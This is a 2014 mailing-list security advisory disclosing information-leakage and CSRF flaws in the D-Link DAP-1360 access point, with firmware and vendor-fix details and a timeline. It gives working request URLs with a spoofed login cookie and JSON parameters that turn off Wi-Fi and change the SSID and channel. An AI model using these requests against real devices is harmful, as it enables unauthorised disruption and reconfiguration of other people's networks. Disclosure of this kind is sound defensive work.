
Date: Sat, 8 Nov 2014 01:01:28 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] IL and CSRF vulnerabilities in D-Link DAP-1360

Hello list!

There are Information Leakage and Cross-Site Request Forgery vulnerabilities 
in D-Link DAP-1360 (Wi-Fi Access Point and Router).

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model 
with other firmware versions also must be vulnerable.

D-Link will fix these vulnerabilities in the next version of firmware (will 
be released in November), as they answered me in October. And also those 
vulnerabilities, which I described earlier, except minor Abuse of 
Functionality vulnerability.

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities 
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes 
fixes for the vulnerabilities.

----------
Details:
----------

Information Leakage (WASC-13):

Request without authorization http://192.168.0.50/index.cgi?v2=y&rq=4.

With request just with special cookie it's possible to get to important 
information about device (IP, MAC and other). It can be done at local 
access, via LAN and via Internet with using of XSS vulnerability.

Cookie: cookie_lang=1; client_login=admin; client_password=1

CSRF (WASC-09):

It's possible to change parameters: Enable Wireless, MBSSID, BSSID.

Turn off Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

Turn on Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}

It's possible to change parameters: Hide Access Point, SSID, Country, 
Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

------------
Timeline:
------------

2014.05.22 - informed developer about multiple vulnerabilities.
2014.05.24 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.01 - disclosed at my site (http://websecurity.com.ua/7179/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
